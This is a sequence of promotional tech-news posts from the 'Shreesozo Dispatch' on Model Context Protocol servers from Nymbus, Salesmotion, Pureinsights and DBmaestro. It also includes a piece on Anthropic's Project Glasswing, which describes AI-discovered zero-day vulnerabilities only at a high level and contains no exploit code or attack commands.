November 2024 - Anthropic releases MCP as an open standard with SDKs for Python and TypeScript
March 2025 - OpenAI adopts MCP across its Agents SDK and Responses API
April 2025 - Google DeepMind confirms MCP support in Gemini models
Late 2025 - AWS, Azure, Google Cloud, and Oracle all announce MCP features or integration
2025-2026 - Stripe, Square, and Shopify build MCP servers for their own platforms
April 2026 - Nymbus ships the first MCP server for core banking

For Nymbus, building on MCP means the server isn't locked to a single AI provider or tool. New AI agents, new LLM integrations, new tooling built on MCP - all of them can connect to the same banking core through the same server. The institution doesn't have to rebuild anything.

The USB-C comparison is overused at this point, but it's accurate: before USB-C, every device needed its own cable. MCP does the same thing for AI integrations. Nymbus just built the banking socket.

The timing is deliberate too. According to Oracle's Banking 4.0 analysis, 2026 is the year banks move from AI pilots to production-scale agentic deployments. Lightweight, composable core systems are becoming the architectural preference precisely because they let banks plug in AI agents without core overhauls. Nymbus is positioning the MCP server as that plug.

What Comes Next

The 19 tools currently in the server are front-office focused. That's the logical starting point - highest frequency, clearest ROI, most visible to customers and branch staff.

The pipeline Nymbus has signaled goes broader. Fraud investigation, case handling, and operational follow-up are already being developed as the next tool set - back-office and compliance functions, which are the most expensive to run manually.

Consider what that looks like in practice. Right now, a fraud alert requires a human to pull case files, cross-reference account data, review transaction history, and escalate with documentation. Reporting from SIBOS 2025 showed that banks deploying agent-based workflows in compliance were calling those functions their most material cost levers over the next two years.

An MCP-connected fraud investigation agent doesn't replace judgment. It removes the manual assembly around it.

If the front-office tools are about speed and service, the back-office tools will be about cost and compliance capacity.

The Broader Signal: Every Regulated Industry Has This Problem

Banking got its first production MCP server. But the problem Nymbus solved - AI agents locked out of core operational systems by fragmented, custom-integration-dependent architecture - is not unique to banking.

Healthcare has the same issue. Insurance has the same issue. Legal, government, logistics. Any sector running on legacy systems with strict compliance requirements is sitting on the same bottleneck.

The MCP protocol is sector-agnostic. The governance pattern Nymbus built - tool-level permissions, role-based access, human-in-the-loop checkpoints, full audit trails - is exportable to any regulated context.

Infront, a wealth management infrastructure provider, has already announced full MCP integration in the next 12-24 months. FinTech Weekly reported in January 2026 that Block, Anthropic, and OpenAI - in partnership with the Linux Foundation - announced the Agentic AI Foundation to establish open standards for agentic AI across financial and non-financial contexts.

Banking solved it first. It won't be the last vertical this happens in.

What This Means If You're Building

Four things worth paying attention to if you're an AI builder, a developer working in fintech, or evaluating MCP for a regulated industry:

1. The governance layer is the product, not the tools

19 tools is a capability list. The per-tool permissions, role-based access, configurable human review gates, and audit trails - that's the architecture that makes it deployable in a regulated environment. Any MCP server targeting regulated industries needs to solve this first, not as an add-on.

2. Standardization wins over customization at scale

The banks that couldn't scale AI weren't failing because of bad models. They were failing because every use case needed its own integration. MCP's value isn't the protocol spec - it's what happens when your AI tooling doesn't require re-integration every time you add a new agent.

3. First-mover advantage in vertical MCP is real

The MCP server ecosystem is still early. Stripe, Square, Shopify, and now Nymbus have staked out their verticals. The platforms that build MCP-native infrastructure now set the default integration patterns for their sectors.

4. Watch the back-office roadmap

Fraud investigation and case handling in the Nymbus pipeline are signals about where agentic banking actually goes: operational cost reduction at scale. Front-office AI is visible. Back-office AI is profitable.

The Bottom Line

Nymbus didn't build a chatbot. They built the infrastructure layer that lets AI agents do real work inside a core banking system, with full institutional control over every call.

19 tools today. Back-office functions in the pipeline. Built on an open standard that every major AI provider and cloud platform now supports. Designed for the compliance constraints that actually govern financial institutions.

The question for every other sector running on legacy cores: how long until they get their own version of this?

First mover in a wide-open space. The watch list just got longer.

Follow Us for weekly breakdowns of MCP, agentic AI, and AI infrastructure.

Sources: Nymbus official announcement · McKinsey Global Banking Review 2025 · Oracle Banking 4.0 · Pento: A Year of MCP · FinTech Weekly on open standards · LatentBridge: AI Trends in Banking 2026

Salesmotion's MCP Server Turns Your AI Assistant into a Live Pipeline Analyst

Om Shree — Sun, 12 Apr 2026 19:01:07 +0000

Sales AI has had a credibility problem for a while now. The pitch always sounds the same: connect your AI assistant to your data, get answers instantly, close more deals. The reality has been a different story — copy-pasting CRM records into ChatGPT, tab-hopping between tools, and hoping the AI figures out what "Q3 pipeline" means in your company's context.

Salesmotion's new MCP server is a different kind of bet. It doesn't just give your AI assistant access to generic company data. It puts your live pipeline in front of the model — no copy-paste required.

What Actually Changed

Model Context Protocol (MCP) is the open standard Anthropic released in late 2024 for letting AI assistants connect to external tools and data. The short version: instead of prompting a model with data you've manually copied, an MCP server exposes structured tools that the AI can call directly. The model figures out which tool to use, calls it, and returns the result — all within the same conversation.

By November 2025, a year after launch, the MCP registry had close to two thousand server entries — 407% growth from the initial batch. By March 2026, the protocol's SDK was pulling 97 million monthly downloads, a trajectory that took React roughly three years to hit. Developers are building MCP servers for everything: GitHub, Notion, Slack, HubSpot, and now sales intelligence platforms.

Salesmotion's entry into that ecosystem is notable for what it doesn't require. The platform monitors 1,000+ public sources in real time — earnings calls, SEC filings, job postings, news — and every insight links back to its original source so reps can verify data in one click. The MCP layer makes all of that queryable through plain conversation in Claude, Copilot, or any other MCP-compatible client.

Zero Install, Thirteen Tools

The server lives at mcp.salesmotion.io. Point your AI tool at the endpoint, drop in your API key, and it's running in under a minute. Nothing to install locally.

The server exposes 13 tools covering the core sales intelligence workflow: account briefs, buying signals, contact lookups, company search, and pipeline scoring. Three pre-built workflows chain those tools together for the three most time-consuming tasks in sales prep — account research, meeting preparation, and signal reviews.

That last category is the interesting one. Sales intelligence MCP servers are the highest-value category for sales teams because they replace the manual process of searching a database UI, exporting results, and pasting them into another tool. Salesmotion goes further: it's not pulling from a static database. It's pulling from continuously updated signal monitoring across your territory.

The practical difference shows up in the questions you can actually ask. Any LLM can tell you that a company recently raised a funding round. That's public information. What Salesmotion's MCP lets you ask is: "Which of my open deals had a CRO change this week?" or "What signals fired on accounts in my territory that I haven't touched in 30 days?" Those questions require both real-time signal data and your pipeline context — something no general-purpose AI has without a proper integration.

The Research Time Problem

The numbers behind this product are worth sitting with. Analytic Partners' reps were spending two to three hours per account per week gathering intelligence from five to ten different sources, with coverage limited to three to five accounts per week. That's a structural ceiling on pipeline generation: your team can only work as many accounts as they have hours to research.

After deploying Salesmotion, that team reduced research time to 15 minutes per account, increased qualified opportunities by 40% year over year, and advanced a $1M+ Fortune 500 opportunity.

The MCP server extends that leverage further. If the research layer is already fast, connecting it to your AI assistant means the agent can prepare a full meeting brief — account context, recent signals, decision maker contacts, and talking points — in a single conversational request. The workflow that used to be: find signal manually → paste context into ChatGPT → get a draft → edit it → send now collapses into one call to the right tool.

Sales teams are catching high-intent opportunities three to six months earlier, cutting account research time by 80%, and seeing reply rates jump from 1–5% to 25–40% when outreach is anchored to specific buying signals. The MCP layer is what makes that intelligence accessible without switching tools.

Security Architecture Worth Understanding

Enterprise sales data is sensitive. The authentication model Salesmotion chose is worth understanding for developers evaluating this integration.

The server stores nothing. Each request passes through to the Salesmotion API using your own credentials, the response comes back, and that's it. All traffic is TLS encrypted. No data intermediary, no storage layer sitting between your pipeline and the AI.

Auth runs on OAuth 2.0 with PKCE (Proof Key for Code Exchange). The MCP spec formally mandated OAuth as the mechanism to access remote MCP servers in March 2025, requiring authorization server discovery so MCP clients can efficiently locate and interact with the correct authorization servers. Salesmotion's implementation includes dynamic client registration for tools that need it — meaning compatible MCP clients can register and authenticate without manual configuration steps.

PKCE is an OAuth extension that protects public clients by binding the authorization code to the client, required under OAuth 2.1. Together with scoped access tokens, it enables apps to securely act on behalf of users without ever handling their sensitive login credentials.

For security teams doing due diligence: the proxy model means your CRM credentials never touch a third-party server. The OAuth flow means tokens are short-lived and revocable. And unlike browser-extension or paste-based workflows, there's a full audit trail of what tools were called and when.

Who It Actually Works With

The server is compatible with Claude (claude.ai, Desktop, and Code), Microsoft Copilot, and any other MCP-compatible client. The broader sales MCP ecosystem now includes servers from Outreach (February 2026), HubSpot, and Amplemarket (March 2026) , covering CRM reads, email search, sequence lookup, and contact enrichment. Salesmotion sits in a different category — it's the signal monitoring and account intelligence layer, not the engagement or sequencing layer.

That distinction matters for how you stack these integrations. In a well-composed sales AI setup, you'd have Salesmotion handling account research and signal detection, something like HubSpot or Salesforce MCP for live CRM record access, and your engagement platform for sequence management. Each server handles what it's good at. The AI assistant orchestrates across all of them.

What This Signals for AI Sales Stacks

The shift MCP is enabling for sales teams is the same one it's enabling everywhere else: from AI as a reactive Q&A tool to AI as an active participant in a workflow.

The old pattern was: rep finds signal manually, pastes context into an AI tool, gets a draft, edits it, sends. Salesmotion's MCP server collapses that loop — the agent reaches into the intelligence layer directly. Ask it to prep you for a meeting and it pulls the account brief, recent signals, decision-maker contacts, and talking points in one call.

Research shows teams using AI account intelligence platforms reduce planning time and see revenue per rep jump by 25%, as AI pulls key data from earnings calls and press releases into clear "why now" insights. The MCP server is what makes that intelligence agent-accessible rather than just dashboard-accessible.

For developers building on top of this: the Salesmotion MCP endpoint is worth evaluating if you're building sales-adjacent AI workflows. The authentication model is clean, the tool schema is structured for agent consumption, and the underlying data — a three-agent system monitoring 1,000+ sources continuously for buying signals, account research, and outreach generation — is significantly richer than what you'd get from a generic CRM connector.

The broader trend is clear. As of April 2026, there are 10,000+ public MCP servers across the ecosystem, and Gartner predicts 75% of API gateway vendors will support MCP by end of 2026. Sales intelligence is one of the highest-value categories because the data is already structured, the workflows are repetitive and time-consuming, and the upside of doing them faster with better context is measurable in pipeline dollars.

Salesmotion's MCP server is one of the first purpose-built integrations in this space that actually does what the pitch promises. The test, as always, is whether it holds up when your reps' accounts are loaded in and the signals start coming.

This article was produced by Shreesozo — an AI content studio specializing in MCP, agentic AI, and developer tools coverage.

Read the full Salesmotion blog at salesmotion.io | Explore the MCP ecosystem at modelcontextprotocol.io

Inside Anthropic's Project Glasswing: The AI Model That Found Zero-Days in Every Major OS

Om Shree — Fri, 10 Apr 2026 05:28:30 +0000

Inside Project Glasswing: The AI Model That Found Zero-Days in Every Major OS

On April 7, 2026, Anthropic announced something that most cybersecurity professionals have been dreading: an AI model that is genuinely better than almost every human at finding and exploiting software vulnerabilities.

They called it Project Glasswing. The model behind it is Claude Mythos Preview.

If you write code, maintain open-source libraries, build infrastructure, or work anywhere near systems that other people depend on - this is not background noise. This is the signal.

What Actually Happened

Let's be precise about what Anthropic revealed, because the details matter more than the headline.

Claude Mythos Preview - a general-purpose frontier model, not a specialized security tool - autonomously identified thousands of zero-day vulnerabilities across every major operating system and every major web browser. These were not obscure edge-case bugs. Several had survived decades of human code review and millions of automated test runs.

Three examples Anthropic disclosed publicly:

A 27-year-old vulnerability in OpenBSD - arguably the most security-hardened OS in the world, the one running firewalls and critical network infrastructure - that let an attacker remotely crash any machine simply by connecting to it.

A 16-year-old vulnerability in FFmpeg, buried in a single line of code that automated fuzzing tools had hit five million times without flagging. Five million hits. Still missed it.

Multiple chained vulnerabilities in the Linux kernel - the software running most of the world's servers - that Mythos strung together autonomously to escalate from regular user access to full machine control.

All three have since been patched. But the implication of finding them - and finding them with no human steering - is what should stop you mid-scroll.

The Benchmark Reality

Anthropic is positioning Mythos Preview as their most capable model ever across agentic coding and reasoning, not just cybersecurity. The security capability is a byproduct of general coding depth, not a narrow specialization.

On CyberGym - the benchmark for cybersecurity vulnerability reproduction - Mythos Preview scored 83.1% against Opus 4.6's 66.6%. That gap is meaningful, but the real story is in the agentic coding numbers:

Benchmark	Mythos Preview	Opus 4.6
SWE-bench Verified	93.9%	80.8%
SWE-bench Pro	77.8%	53.4%
Terminal-Bench 2.0	82.0%	65.4%
CyberGym	83.1%	66.6%
GPQA Diamond	94.6%	91.3%

These are not marginal improvements. A model that can autonomously navigate terminal environments, reason across multi-file codebases, and chain together multi-step software modifications at this level is also, almost by definition, a model that can chain together multi-step exploits.

The offensive capability is a side effect of the capability you actually want for building things.

The Coalition Behind Project Glasswing

Anthropic didn't just publish a blog post. They assembled a working coalition: AWS, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorganChase, the Linux Foundation, Microsoft, NVIDIA, and Palo Alto Networks as launch partners, plus over 40 additional organizations covering critical software infrastructure.

This is not a press release coalition. Each partner had hands-on access to Mythos Preview for several weeks before the announcement.

Cisco's Chief Security and Trust Officer said AI capabilities have crossed a threshold that makes old hardening approaches insufficient. CrowdStrike's CTO noted that the window between vulnerability discovery and active exploitation has collapsed - what once took months now happens in minutes. Microsoft tested Mythos Preview against CTI-REALM, their open-source security benchmark, and reported substantial improvements over prior models.

The Linux Foundation's CEO Jim Zemlin made a point worth sitting with: open-source maintainers have historically been left to handle security on their own, without the budget for dedicated security teams. Most of the world's critical infrastructure runs on open-source code. Project Glasswing is specifically targeting that gap, giving maintainers access to a model that can proactively scan and fix vulnerabilities at a scale that was never practically achievable before.

Anthropic is committing $100M in model usage credits to support the initiative, plus $4M in direct donations - $2.5M to Alpha-Omega and OpenSSF through the Linux Foundation, and $1.5M to the Apache Software Foundation.

The Asymmetry Problem - And Why It's the Real Issue

Here is the uncomfortable framing that Anthropic is being direct about: the same capabilities that make Mythos Preview useful for defenders will eventually be accessible to attackers.

DARPA's first Cyber Grand Challenge was a decade ago. That was the moment automated vulnerability hunting moved from theoretical to demonstrated. The question since then has been how long until AI closes the gap with the best human security researchers. Based on Mythos Preview's results, that question now has an answer.

A model trained with strong coding and reasoning ability - trained for legitimate purposes like building software, writing documentation, reviewing PRs - can, at sufficient capability levels, also find vulnerabilities that have evaded human review for decades. The offensive dual-use risk is not hypothetical. It is the current moment.

This is why the defensive head start matters. If you're maintaining infrastructure that other people depend on, the window between "this capability exists" and "this capability is being used against your systems" is not measured in years anymore.

What This Means for Developers and Infrastructure Engineers

If you work in any of the following areas, Project Glasswing is directly relevant to you.

Open-source maintainers: The Claude for Open Source program is offering access to Mythos Preview specifically for scanning and securing open-source codebases. If you maintain a library with meaningful downstream usage, apply. The barrier to running automated security analysis at this level just dropped significantly.

Security engineers: The tasks Anthropic expects partners to focus on include local vulnerability detection, black-box testing of binaries, securing endpoints, and penetration testing. If your team has been bottlenecked on manual review throughput, this changes the calculus.

Platform and infrastructure engineers: If your stack includes Linux, any major browser engine, FFmpeg, or other widely-deployed open-source components - and whose does not - the vulnerabilities being surfaced here may affect software you're running right now. Stay close to the patch cadence coming out of this initiative.

Developer tooling builders: Anthropic will share what they learn publicly within 90 days, including practical recommendations around vulnerability disclosure processes, software development lifecycle hardening, patching automation, and triage scaling. This is going to reshape how security gets built into the development process at a tooling level.

The broader signal for anyone building AI-adjacent infrastructure: the agentic coding capability that makes Mythos Preview effective at security work is the same capability that will define the next generation of autonomous development agents. The security properties of those agents - how they handle code they're operating on, what they can and cannot access, how their outputs are scoped - are going to matter a great deal.

The Model Itself

Mythos Preview is not being released publicly. Anthropic is explicit about this. Access is gated to Project Glasswing partners and the additional 40+ organizations they've brought in.

Their reasoning is worth understanding: they want to develop cybersecurity safeguards - detection and blocking for the model's most dangerous outputs - before making Mythos-class capability broadly available. They're planning to launch and refine those safeguards with an upcoming Claude Opus model, which carries less risk at its capability level, before applying them to Mythos-class models.

This is a sequencing decision, not a capability limitation. The safeguards need to be tested at scale against a less dangerous baseline before they're trusted to handle the full capability surface.

When Mythos Preview does become broadly accessible, pricing is set at $25 per million input tokens and $125 per million output tokens - available through the Claude API, Amazon Bedrock, Google Cloud's Vertex AI, and Microsoft Foundry.

The Longer Arc

Project Glasswing is explicitly positioned as a starting point, not a finished solution. Anthropic has been in direct discussion with US government officials about Mythos Preview's offensive and defensive cyber capabilities. The initiative's 90-day public reporting commitment, the open-source donation structure, and the explicit invitation to other AI companies to join in setting industry standards all point toward a longer institutional effort.

The honest framing: frontier AI capability in cybersecurity is now real, demonstrated, and in the hands of defenders. The same capability will reach adversaries. The lead time between those two moments is the entire window that Project Glasswing is trying to use.

For developers and infrastructure engineers, the practical takeaway is straightforward. The automated security analysis that used to require either significant budget or significant luck is becoming accessible at scale. The open-source ecosystem - which the entire industry has been freeloading on from a security-review standpoint for years - is finally getting the tooling that matches the importance of what it does.

The 27-year-old OpenBSD vulnerability that Mythos Preview found autonomously had survived because security expertise is expensive and time is finite. Both of those constraints are changing. The question now is whether the defensive side moves faster than the offensive side.

Project Glasswing is a bet that it can.

Claude Mythos Preview is currently available as a gated research preview. Open-source maintainers can apply for access through Anthropic's Claude for Open Source program. The full technical writeup, including vulnerability details for patched bugs, is available on Anthropic's Frontier Red Team blog.

Published by Om Shree | Shreesozo - The Shreesozo Dispatch covers MCP, agentic AI, and developer tools for builders who don't have time for hype.

Enterprise Search Just Got a Protocol Upgrade: Inside Pureinsights Discovery 2.8*

Om Shree — Thu, 09 Apr 2026 18:12:48 +0000

The Shreesozo Dispatch | MCP & Agentic AI | April 2026

The Problem Nobody Was Fixing Fast Enough

Enterprise search and AI agents have been living in parallel universes.

On one side: search platforms indexing PubMed, SharePoint, internal wikis, Oracle databases, and file shares. On the other: AI agents capable of reasoning, planning, and executing tasks. The problem was that agents couldn't reach the search layer. Every connection required a custom integration — its own connector code, its own auth logic, its own maintenance burden.

This wasn't a minor inconvenience. It was the core bottleneck blocking AI agents from being genuinely useful in enterprise settings. An agent that can't query your knowledge base is an agent operating blind.

Pureinsights Discovery 2.8, released this week, takes a direct run at that problem.

What Discovery 2.8 Actually Ships

The headline feature is native MCP support inside QueryFlow — Pureinsights' API builder and query orchestration layer.

Model Context Protocol, introduced by Anthropic in November 2024 and since adopted by OpenAI, Google DeepMind, Microsoft, and AWS, is the open standard for connecting AI agents to external tools and data without building custom integrations for each pairing. Before MCP, every time an AI system needed to talk to a new tool, someone had to write a connector. Now there's one protocol. If both sides speak it, they talk.

What Discovery 2.8 does is let developers expose their search entrypoints as custom MCP servers. Any MCP-compatible agent can then call those entrypoints directly — no glue code, no brittle API wrappers sitting in the middle. The MCP support isn't layered on top of QueryFlow as an afterthought; it runs through the same pipeline infrastructure that Discovery already uses for query orchestration.

Kamran Khan, CEO of Pureinsights, put it plainly in the release: "With MCP support, our customers can now connect Discovery directly into the agentic AI workflows and tools they're already building."

Beyond MCP, the release ships several connectors that close real gaps in enterprise data access:

SharePoint Online — Full crawling of sites, subsites, lists, list items, files, and attachments. Microsoft's document ecosystem, directly inside Discovery ingestion pipelines. SharePoint sits at the center of knowledge management for thousands of enterprises and has historically been one of the harder silos to crack for AI retrieval.

OracleDB — Native Oracle Database support via JDBC. Connect to Oracle, execute SQL, retrieve table data for ingestion.

SMB — Crawl network file shares via a new Filesystem component.

LDAP — Query enterprise directory services, retrieve users and groups.

The pattern across all four is consistent: each connector removes another category of "unreachable" data from the equation.

The Schedules API rounds out the release. It lets teams trigger data ingestion seeds using cron expressions, so pipelines run on a defined schedule instead of requiring someone to manually kick them off. For teams running real-time knowledge pipelines, automated ingestion isn't a nice-to-have — it's the baseline.

Why This Release Lands at a Meaningful Moment

MCP's growth trajectory over the past 16 months is hard to argue with.

Anthropic launched the protocol in November 2024 with roughly 2 million monthly SDK downloads. By March 2026, that number had grown to 97 million. The milestones in between tell the story: OpenAI adopted it in April 2025, Microsoft Copilot Studio in July 2025, AWS Bedrock in November 2025. The ecosystem now includes over 5,800 community-built servers. The Linux Foundation took governance of the protocol in December 2025, which is the kind of institutional move that turns "interesting standard" into "durable infrastructure."

Enterprise search specifically has been one of the slower categories to adopt agentic patterns. Most search platforms were built to serve human users — not to be called programmatically by agents operating inside larger pipelines. MCP changes that by giving search tools a standardized way to expose themselves to the agent layer.

The efficiency argument is straightforward. Before MCP, connecting an AI agent to 10 internal tools meant building and maintaining 10 separate integrations. With MCP, each tool exposes one server that works across compliant agents — the math moves from multiplicative to additive. That's why CIOs are now paying attention to a protocol specification, which is not something that happens often.

Pureinsights is one of the first enterprise search vendors to ship native MCP support. In a market where timing relative to protocol adoption tends to compound, that positioning matters.

What This Looks Like in Practice

Consider a common enterprise scenario: a research team needs an AI assistant that can pull from PubMed, an internal SharePoint repository, and a proprietary Oracle database — and synthesize answers across all three.

Before Discovery 2.8, that meant custom integration work for each source, different authentication schemes per system, and ongoing maintenance as each platform updates independently.

With MCP support in QueryFlow, the developer exposes each search entrypoint as an MCP server. The agent calls those servers directly using the standard protocol. SharePoint data is crawled and indexed through the new connector. Oracle tables are queried via JDBC. Ingestion runs automatically on cron via the Schedules API. The pipeline doesn't need a human operator watching it. The agent doesn't need bespoke code to reach any of it.

That's what "low-code agentic pipeline" actually means when it ships in a real product — not a marketing slide, but a working architecture where the protocol handles the connection layer and the developer focuses on the logic.

The Pureinsights Discovery Platform is already used across financial services, government, retail, and media. Those aren't sectors known for tolerating fragile integrations. Shipping MCP as a first-class capability rather than an add-on signals that this is meant to hold up in production, not just in demos.

The Broader Signal — and the Open Question

Discovery 2.8 is a product release, but it reflects something larger happening across the enterprise software landscape. MCP is moving from developer tooling into production infrastructure. When a cloud-native search platform ships native MCP support as a first-class capability, it signals that the protocol has crossed a meaningful threshold.

The remaining challenge is the one that follows every fast-moving protocol: security. Researchers have flagged prompt injection risks, tool poisoning vectors, and access control gaps as areas that need serious attention before MCP is ready for the most sensitive enterprise data. Pureinsights operates in financial services and government — sectors where those concerns aren't theoretical. How they address those security questions in future releases will determine how deep into regulated environments Discovery can go.

Anthropic's own roadmap includes OAuth 2.1 with enterprise identity provider integration targeting Q2 2026. That should help. But for teams deploying MCP-connected systems today, governance and access control need to be explicitly designed in, not assumed.

For now, Discovery 2.8 puts a concrete product behind an idea that has mostly lived in architecture diagrams: enterprise search as an active participant in agentic AI workflows, not a static database sitting behind a wall.

If you're building agentic pipelines on top of enterprise data, this release is worth a close look. Full details are available at pureinsights.com.

Published by Om Shree | Shreesozo — The Shreesozo Dispatch covers MCP, agentic AI, and developer tools for builders who don't have time for hype.

Databases Finally Got an Agent: What DBmaestro's MCP Server Actually Changes

Om Shree — Wed, 08 Apr 2026 11:48:03 +0000

For the past two years, AI agents have been quietly eating the software development lifecycle. They write code, review PRs, spin up cloud infra, patch vulnerabilities, and manage CI/CD pipelines. Developers have been running agents inside their IDEs, their terminals, and their deployment workflows.

But one layer stayed stubbornly offline: the database.

Not because nobody tried. Because the database is the one place in your stack where a hallucination, a bad permission, or an unchecked agent action can end your career in a single transaction. Production databases carry the audit requirements, the compliance obligations, the backup contracts, and the career-defining "who approved this change?" conversations. Governance wasn't optional. It was the whole point.

That's why DBmaestro's announcement this week is worth paying attention to. On April 7, 2026, they launched what they're calling the first database DevOps platform purpose-built for agentic AI workflows - an MCP server that exposes their entire platform to AI agents while keeping enterprise governance fully intact. This isn't a chatbot wrapper around a database. It's something structurally different.

The Part of DevOps That Never Got Automated

If you've worked on a team that ships software regularly, you know how the database part of the release usually goes. App code deploys through a pipeline. Infrastructure gets provisioned by Terraform. The database? Someone opens a ticket, a DBA reviews it, scripts get written by hand, environments get synced one by one, and everyone crosses their fingers during the prod deployment window.

The tooling gap has been real. As one DBmaestro customer put it, they went from one manual release every three weeks to over 2,300 releases per month after adopting the platform. That's not a marginal improvement - that's a different operating model entirely. But even with platforms like DBmaestro, the setup process, environment orchestration, and pipeline creation still required a human typing commands and configuring workflows.

Agents have been absorbing these manual tasks everywhere else in the stack. Code, infra, cloud configs - all agent-accessible through standardized interfaces. Databases stayed behind because plugging an agent into your production database without a layer of deterministic, auditable control was simply too risky. The stakes, as the Dispatch carousel put it, are too high to wing it.

What the MCP Server Actually Does

DBmaestro's MCP server exposes their full platform to any AI agent or enterprise copilot that speaks the Model Context Protocol. That includes their database release automation, source control, CI/CD orchestration, and compliance capabilities - all the things that used to require manual configuration inside their UI.

The practical demo they've been showing is instructive. You can type something like: "Create an MSSQL release pipeline with Dev/QA/Prod environments, and update Dev and QA to the latest version" - and it actually executes. Not a plan. Not a summary. The real pipeline gets created. The real deployments run.

That matters because most tools billing themselves as "AI for DevOps" are, as the Dispatch framed it, glorified scripts with a chat interface. They generate YAML for you to copy-paste. They suggest commands for you to run. DBmaestro's approach is different: the agent calls deterministic, enterprise-grade workflows that already existed. Natural language becomes the input layer, but the execution layer is the same governed platform that enterprises have been running in production.

The key technical distinction is that the agent operates inside the guardrails, not around them. Role-based access control, compliance tracking, and full audit trails remain completely intact. If a user doesn't have permission to deploy to production, the agent doesn't either. The agent inherits the permission model - it doesn't bypass it. That's the design decision that makes this deployable in regulated environments where unchecked agent access would be a non-starter.

Why Governance Is the Actual Product

There's a tendency in the MCP space to talk about connectivity as the primary value - what tools can an agent reach, how many integrations does it have, how many data sources can it query. DBmaestro's announcement flips that framing. The governance isn't a constraint bolted onto the connectivity. It's the product.

Gil Nizri, DBmaestro's CEO, put it directly: "DBmaestro MCP turns our enterprise-grade database DevOps platform into an agentic operational layer for AI. DBAs and DevOps engineers can now interact in natural language to accelerate repetitive tasks, while AI becomes the interface to deterministic, governed workflows. This is not replacing database expertise - it's amplifying it with enterprise-grade control."

That framing is significant. The agent acceleration is the feature. The governance infrastructure is the prerequisite for the feature being usable in the first place.

This matches a broader pattern that's become clear in enterprise AI adoption over the past year. The enterprises actually deploying agents in production aren't the ones who gave agents the most access - they're the ones who built the tightest access controls first, then opened up incrementally. Per research from Spectro Cloud, agentic AI is expected to be widely adopted in 2026, but the organizations leading in production deployment are those that invested in governance frameworks, MCP-based access controls, and audit infrastructure early.

The challenge isn't giving agents tools. It's giving agents tools with traceable, revocable, policy-enforced access. DBmaestro's existing enterprise platform happened to be exactly that kind of infrastructure - they just needed to expose it via MCP.

The IBM OEM Angle You Shouldn't Skip

DBmaestro isn't a startup selling a demo. IBM OEMs their release automation as part of their DevOps portfolio. That means DBmaestro's workflows are already running inside some of the world's most complex and regulated technology environments - financial services, healthcare, large-scale enterprise deployments where a bad database change has eight-figure consequences.

The MCP layer is that same engine, now accessible to any enterprise copilot. You're not hooking an AI agent into an experimental database tool. You're giving the agent an interface to infrastructure that's been hardened through IBM-grade enterprise use cases.

Yaniv Yehuda, DBmaestro's Founder and CPO, stated it clearly: "Every enterprise adopting AI agents needs secure, governed access to their core platforms." That's not a product pitch - that's the architectural problem they've spent years building the answer to. The MCP server is the protocol-level interface to an answer that already exists.

The Pattern This Fits

DBmaestro's launch isn't an isolated event. It's part of a wave of governed MCP servers targeting the last holdouts in the enterprise stack - the systems where direct agent access was previously too risky to seriously consider.

Look at what's happening in parallel. Microsoft launched their SQL MCP Server as part of Data API Builder, using what they call an NL2DAB model - the agent reasons in natural language, but execution goes through a deterministic abstraction layer rather than raw NL-to-SQL translation. The point isn't to let the agent write its own queries. The point is to give the agent a controlled interface with the same RBAC and telemetry that governs every other access path. LangGrant launched LEDGE, an MCP server specifically designed to let LLMs reason across enterprise database environments without ever reading the underlying data itself - keeping sensitive records inside enterprise boundaries while giving agents comprehensive structural context.

The common thread: nobody serious about production is giving agents raw database access. The architecture that's emerging is governed MCP servers as the interface layer between agents and critical enterprise systems. Not "can the agent reach this system" but "what can the agent do in this system, under what permissions, with what audit trail."

CloudBees, Atlassian, GitHub - the governance-first MCP approach is showing up across the software delivery lifecycle. DBmaestro is that approach applied to the database layer specifically.

What This Means for DBAs and DevOps Engineers

The fear that gets raised in these conversations is always the same: agents are coming for the DBA's job. DBmaestro's actual implementation suggests the opposite framing is more accurate.

The repetitive parts of database operations - standing up pipelines, syncing environments, managing package deployments across dev/QA/prod - are exactly the kind of work that creates cognitive overhead without creating value. A DBA who spends two hours configuring release pipelines isn't doing the irreplaceable parts of their job. They're doing coordination work that an agent can absorb, under governance rules that the DBA's organization already defined.

What remains after agents handle the mechanical setup is the actual engineering judgment: schema design decisions, performance tradeoffs, the call on whether a particular migration is safe to run in production right now. The agent accelerates access to the platform. The human retains accountability for what the platform does.

This is the same shift that happened when CI/CD systems absorbed the manual deployment process. The work didn't disappear - it moved up the value chain. Engineers stopped being deployment coordinators and started spending that time on the harder architectural problems.

Database operations are heading the same direction. The governance infrastructure that makes this safe is what DBmaestro has been building for years. The MCP server is the interface that makes it agent-accessible.

The Broader Takeaway

AI agents have been incrementally absorbing the manual labor of software delivery for two years. Code review, infra provisioning, CI/CD management, observability - each of these got agentic tooling as soon as someone built a governed interface that made it safe.

The database was the gap because the stakes were uniquely high and the governance requirements were uniquely complex. DBmaestro's MCP server closes that gap - not by lowering the governance bar, but by surfacing a mature, enterprise-tested governance stack through an agent-accessible protocol.

The broader pattern is the one to track: governed MCP servers for critical enterprise systems. Not agents with unchecked access to everything. Agents operating inside compliance boundaries that already exist, with natural language as the new interface to workflows that were always deterministic.

The database era of agentic DevOps just started. The infrastructure to run it safely has been in production for years.

Follow Shreesozo for weekly coverage of MCP, agentic AI, and the infrastructure being built around it.